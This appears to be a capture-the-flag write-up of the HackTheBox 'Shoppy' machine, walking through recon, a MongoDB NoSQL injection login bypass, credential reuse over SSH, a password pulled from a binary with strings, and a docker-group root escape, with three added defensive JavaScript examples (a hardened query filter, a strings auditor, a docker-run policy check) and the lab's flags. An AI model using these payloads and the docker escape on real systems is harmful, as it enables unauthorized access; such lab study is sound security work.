Shoppy

Recon

nmap_scan.log
Open 10.129.227.233:22
Open 10.129.227.233:80
Open 10.129.227.233:9093
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.233

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDApZi3Kltv1yDHTatw6pKZfuIcoHfTnVe0W1yc9Uw7NMUinxjjQaQ731J+eCTwd8hBcZT6HQwcchDNR50Lwyp2a/KpXuH2my+2/tDvISTRTgwfMy1sDrG3+KPEzBag07m7ycshp8KhrRq0faHPrEgcagkb5T8mnT6zr3YonzoMyIpT+Q1O0JAre6GPgJc9im/tjaqhwUxCH5MxJCKQxaUf2SlGjRCH5/xEkNO20BEUYokjoAWwHUWjK2mlIrBQfd4/lcUzMnc5WT9pVBqQBw+/7LbFRyH4TLmGT9PPEr8D8iygWYpuG7WFOZlU8oOhO0+uBqZFgJFFOevq+42q42BvYYR/z+mFox+Q2lz7viSCV7nBMdcWto6USWLrx1AkVXNGeuRjr3l0r/698sQjDy5v0GnU9cMHeYkMc+TuiIaJJ5oRrSg/x53Xin1UogTnTaKLNdGkgynMqyVFklvdnUngRSLsXnwYNgcDrUhXxsfpDu8HVnzerT3q27679+n5ZFM=
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHiKrH/B/4murRCo5ju2KuPgkMjQN3Foh7EifMHEOwmoDNjLYBfoAFKgBnrMA9GzA+NGhHVa6L8CAxN3eaGXXMo=
|   256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBRsWhJQCRHjDkHy3HkFLMZoGqCmM3/VfMHMm56u0Ivk
80/tcp   open  http    syn-ack nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.23.1
9093/tcp open  http    syn-ack Golang net/http server
|_http-title: Site doesn't have a title (text/plain; version=0.0.4; charset=utf-8).
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Sun, 08 Dec 2024 11:56:52 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 4
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 4
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 3.0577e-05
|     go_gc_duration_seconds{quantile="0.25"} 0.000174617
|_    go_gc_du
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: FD9E8D8302B1619B431F6356984201A1
|_http-trane-info: Problem with XML parsing of /evox/about
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

HTTP (80)

[screenshot: Writeup.png]

Feroxbuster almost crashed the server, but it found the login page.

└─$ feroxbuster -u 'http://shoppy.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -D -C 400,404 -S 2066 -k --thorough -I .js,.css,.png
...
302      GET        1l        4w       28c http://shoppy.htb/admin => http://shoppy.htb/login
...

admin:admin didn't work

[screenshot: Writeup-1.png]

No credentials, so we can't proceed. The payload admin' AND 1=1 -- - took what felt like a year to return a response, but that might be related to special characters in the fields.

└─$ domain='shoppy.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 8
Nothing
└─$ domain='shoppy.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 8
Nothing
└─$ domain='shoppy.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/n0kovo_subdomains.txt -mc all -fl 8
mattermost              [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 86ms]
[screenshot: Writeup-2.png]

After too much fuzzing the application finally crashed and returned a backtrace instead of a Gateway Timeout. The reason for testing NoSQLi was that the login accepted JSON data, so it would most probably work.

[screenshot: Writeup-3.png]

Username: jaeger

The application probably crashed, and each time it took 2-3 minutes to restart and return a response 💀

https://book.hacktricks.xyz/pentesting-web/nosql-injection#sql-mongo

Finally something worked.

{"username":"x' || '1'=='1","password":"x"}     // Failed
{"username":"admin' || '1'=='1","password":"x"} // Worked
[screenshot: Writeup-4.png]
[screenshot: Writeup-5.png]

If we search for the admin user we can export the details; the password hash is not found in CrackStation.

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"}]

Try NoSQLi payload again

admin' || 'a'=='a
[
  {
    "_id": "62db0e93d6d6a999a66ee67a",
    "username": "admin",
    "password": "23c6877d9e2b564ef8b32c3a23de27b2"
  },
  {
    "_id": "62db0e93d6d6a999a66ee67b",
    "username": "josh",
    "password": "6ebcea65320589ca4f2f1ce039975995"
  }
]
[screenshot: Writeup-6.png]
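To see why x' || '1'=='1 failed while admin' || '1'=='1 worked, and why the search payload returned every user, here is an added example (not Shoppy's source, which the writeup never saw) of a login and a search built on a string-concatenated MongoDB $where predicate, next to a hardened version that passes the input as data. Mongo's server-side JavaScript evaluation is stood in for by new Function over an in-memory array; the collection contents are constructed and the password fields are placeholders, not the hashes above.

```javascript
// Added example, not Shoppy's source: a string-built `$where` predicate
// reproduces the injection behaviour seen above; an equality filter does not.
// Mongo's server-side JS evaluation is simulated with `new Function` over an
// in-memory array (assumption: enough to show the operator-precedence effect).

// Constructed sample collection; password values are placeholders, not hashes.
const USERS = [
  { _id: "62db0e93d6d6a999a66ee67a", username: "admin", password: "placeholder-admin-secret" },
  { _id: "62db0e93d6d6a999a66ee67b", username: "josh",  password: "placeholder-josh-secret" },
];

// Stand-in for collection.find(): a `$where` JS string is evaluated with the
// document bound to `this`; any other filter is a plain equality match.
function find(filter, docs = USERS) {
  if (typeof filter.$where === "string") {
    const predicate = new Function(`return (${filter.$where});`);
    return docs.filter((doc) => predicate.call(doc));
  }
  return docs.filter((doc) =>
    Object.entries(filter).every(([key, value]) => doc[key] === value));
}

// VULNERABLE (hypothetical): the username is spliced into code, so a quote
// in it ends the string literal and the rest becomes part of the predicate.
function loginVulnerable(username, password) {
  const filter = {
    $where: `this.username == '${username}' && this.password == '${password}'`,
  };
  return find(filter)[0] || null;
}

function searchVulnerable(username) {
  return find({ $where: `this.username == '${username}'` });
}

// HARDENED: insist on string inputs (a JSON body can otherwise smuggle an
// operator object where a string is expected) and match them as data.
function requireString(value, name) {
  if (typeof value !== "string") throw new TypeError(`${name} must be a string`);
  return value;
}

function loginSafe(username, password) {
  const filter = {
    username: requireString(username, "username"),
    password: requireString(password, "password"),
  };
  return find(filter)[0] || null;
}

function searchSafe(username) {
  return find({ username: requireString(username, "username") });
}

// Why one payload failed and the other worked: && binds tighter than ||.
//   x' || '1'=='1      -> this.username == 'x' || ('1'=='1' && this.password == 'x')      no row
//   admin' || '1'=='1  -> this.username == 'admin' || ('1'=='1' && this.password == 'x')  admin row
// The search predicate has no && clause, so admin' || 'a'=='a is true for every row.
console.log(loginVulnerable("x' || '1'=='1", "x"));                          // null
console.log(loginVulnerable("admin' || '1'=='1", "x").username);             // admin
console.log(searchVulnerable("admin' || 'a'=='a").map((u) => u.username));   // [ 'admin', 'josh' ]
console.log(loginSafe("admin' || '1'=='1", "x"));                            // null
console.log(searchSafe("admin' || 'a'=='a"));                                // []
```

The fix is not escaping quotes but never letting user input become code: an equality filter object treats the value as an opaque string, and the type check closes the other JSON-specific hole where an object replaces the string.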

Creds: josh:remembermethisway

We can now log in to the chat application.

[screenshot: Writeup-7.png]

Creds: jaeger:Sh0ppyBest@pp!

SSH

└─$ sshpass -p 'Sh0ppyBest@pp!' ssh jaeger@shoppy.htb
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)

User.txt

jaeger@shoppy:~$ cat user.txt
968fb59421e41468298ce64891e4f3ac

Privilege Escalation (deploy)

jaeger@shoppy:~$ sudo -l
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

With strings we can take a look at what's happening, and luckily for us a different encoding (16-bit little-endian, strings -el) shows the password in plaintext.

jaeger@shoppy:/home/deploy$ strings /home/deploy/password-manager | grep -v '^[._;\[]'
/lib64/ld-linux-x86-64.so.2
system
libstdc++.so.6
libgcc_s.so.1
libc.so.6
GCC_3.0
GLIBC_2.2.5
CXXABI_1.3
GLIBCXX_3.4
GLIBCXX_3.4.21
u/UH
Welcome to Josh password manager!
Please enter your master password:
Access granted! Here is creds !
cat /home/deploy/creds.txt
Access denied! This incident will be reported !
zPLR
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
completed.0
frame_dummy
password-manager.cpp
DW.ref.__gxx_personality_v0
system@GLIBC_2.2.5

jaeger@shoppy:/home/deploy$ strings /home/deploy/password-manager -el | grep -v '^[._;\[]'
Sample

jaeger@shoppy:/home/deploy$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
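The master password was missed by a plain strings run because it was stored as 16-bit characters. Here is an added example, not Josh's password-manager and not binutils, that re-implements the scan so a defender can audit their own binaries for secrets in the encodings a default pass skips; it goes beyond the page's case by also covering 32-bit little-endian text (a Linux wchar_t). The sample "binary" is constructed inline and contains no real secret.

```javascript
// Added example, not from the page or the box: a re-implementation of the
// `strings` scan used above, so a defender can audit their own binaries for
// secrets embedded in encodings a plain ASCII pass misses. `width` is the
// byte width of one character: 1 (plain `strings`), 2 (`strings -el`,
// 16-bit little-endian) or 4 (32-bit little-endian, a Linux wchar_t).
// Unaligned strings are handled by scanning every byte phase (assumption:
// good enough for an audit, not a byte-for-byte clone of binutils).

function isPrintableAscii(code) {
  return code >= 0x20 && code <= 0x7e;
}

// Returns every run of at least `minLen` printable characters encoded as
// `width`-byte little-endian units (low byte printable, upper bytes zero).
function extractStrings(buf, { width = 1, minLen = 4 } = {}) {
  const found = [];
  for (let phase = 0; phase < width; phase++) {
    let run = "";
    for (let i = phase; i + width <= buf.length; i += width) {
      let ok = isPrintableAscii(buf[i]);
      for (let k = 1; k < width && ok; k++) ok = buf[i + k] === 0;
      if (ok) {
        run += String.fromCharCode(buf[i]);
        continue;
      }
      if (run.length >= minLen) found.push(run);
      run = "";
    }
    if (run.length >= minLen) found.push(run);
  }
  return found;
}

// One pass over all three encodings, tagged so the audit output says which
// `strings` invocation would have shown each string.
function findAllEncodings(buf, minLen = 4) {
  const encodings = [[1, "ascii"], [2, "utf16le"], [4, "utf32le"]];
  return encodings.flatMap(([width, name]) =>
    extractStrings(buf, { width, minLen }).map((text) => ({ encoding: name, text })));
}

// Builds 32-bit little-endian text for the constructed sample.
function utf32le(text) {
  const out = Buffer.alloc(text.length * 4);
  for (let i = 0; i < text.length; i++) out.writeUInt32LE(text.charCodeAt(i), i * 4);
  return out;
}

// Constructed stand-in for a binary: ELF-like header bytes, an ASCII prompt,
// a 16-bit LE string (the case on the box), and a 32-bit LE one. The
// unaligned offsets are deliberate. No real secrets.
const SAMPLE_BINARY = Buffer.concat([
  Buffer.from([0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00]),
  Buffer.from("Please enter your master password:", "latin1"),
  Buffer.from([0x00, 0x00, 0x01]),
  Buffer.from("Sample", "utf16le"),
  Buffer.from([0x00, 0x00, 0xff, 0x01]),
  utf32le("NotTheRealSecret"),
  Buffer.from([0x00, 0x00, 0x00, 0x00]),
]);

console.log(extractStrings(SAMPLE_BINARY, { width: 1 })); // prompt only: the secret is invisible
console.log(extractStrings(SAMPLE_BINARY, { width: 2 })); // [ 'Sample' ]
console.log(findAllEncodings(SAMPLE_BINARY));             // all three, tagged by encoding
```

A one-byte scan reports only the prompt, exactly as the first strings run above did, because every wide character is a printable byte followed by zeros; the two- and four-byte scans recover the rest. The durable fix is the same either way: a secret compiled into a binary that other users can read is readable, whatever its encoding.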

Privilege Escalation (root)

https://gtfobins.github.io/gtfobins/docker/

└─$ sshpass -p 'Deploying@pp!' ssh deploy@shoppy.htb
$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root
# ls
root.txt
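Membership in the docker group is equivalent to root, which is the real finding here; a compensating control is to reject run requests that hand a container the host filesystem. The following is an added example, not from the page or GTFOBins, of a policy check over a docker run argument vector: it flags the bind mount of / used above and, going beyond the page, other sensitive host paths, the --mount spelling of the same thing, and --privileged. The path list and the argument vectors are constructed for the example.

```javascript
// Added example, not from the page: an admission-style check over a proposed
// `docker run` argv. "/" is the page's case; the other paths, the --mount
// form and --privileged are additions. Policy list is constructed.

const SENSITIVE_HOST_PATHS = ["/", "/etc", "/root", "/home", "/proc", "/sys", "/var/run/docker.sock"];

// Collapse "." and ".." so "/etc/../" is recognised as "/".
function normalizePosix(p) {
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop();
    else out.push(seg);
  }
  return "/" + out.join("/");
}

function isSensitiveHostPath(hostPath) {
  const norm = normalizePosix(hostPath);
  return SENSITIVE_HOST_PATHS.some((p) => norm === p || (p !== "/" && norm.startsWith(p + "/")));
}

// `-v host:container[:opts]` is a bind mount; a spec without a leading "/"
// before the first ":" is a named volume and has no host path.
function hostPathOfVolumeSpec(spec) {
  const head = spec.split(":")[0];
  return spec.includes(":") && head.startsWith("/") ? head : null;
}

// Returns one finding per offending argument; an empty array means allowed.
function auditDockerRun(argv) {
  const findings = [];
  for (let i = 0; i < argv.length; i++) {
    const arg = argv[i];
    let hostPath = null;
    if (arg === "-v" || arg === "--volume") {
      hostPath = hostPathOfVolumeSpec(argv[++i] || "");
    } else if (arg.startsWith("--volume=")) {
      hostPath = hostPathOfVolumeSpec(arg.slice("--volume=".length));
    } else if (arg === "--mount" || arg.startsWith("--mount=")) {
      const opts = arg === "--mount" ? argv[++i] || "" : arg.slice("--mount=".length);
      const kv = Object.fromEntries(opts.split(",").map((pair) => pair.split("=")));
      if (kv.type === "bind") hostPath = kv.source || kv.src || null;
    } else if (arg === "--privileged") {
      findings.push({ argument: arg, hostPath: null, reason: "container runs without the default isolation" });
    }
    if (hostPath !== null && isSensitiveHostPath(hostPath)) {
      findings.push({
        argument: arg,
        hostPath: normalizePosix(hostPath),
        reason: "bind-mounts a sensitive host path into the container",
      });
    }
  }
  return findings;
}

// The command from the box, split into an argument vector.
const PAGE_COMMAND = ["run", "-v", "/:/mnt", "--rm", "-it", "alpine", "chroot", "/mnt", "sh"];
console.log(auditDockerRun(PAGE_COMMAND));                                   // one finding, hostPath "/"
console.log(auditDockerRun(["run", "-v", "pgdata:/var/lib/postgresql/data", "postgres"])); // []
```

Run at the point where jobs are admitted (a CI runner, a wrapper around the docker CLI, or an authorization plugin), this turns the pattern into a logged, refused event rather than a silent root shell; it does not replace keeping the docker group to accounts that are already trusted with root.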

Root.txt

# cat root.txt
f4f64720a859b9f098c1de4ac8139dcd
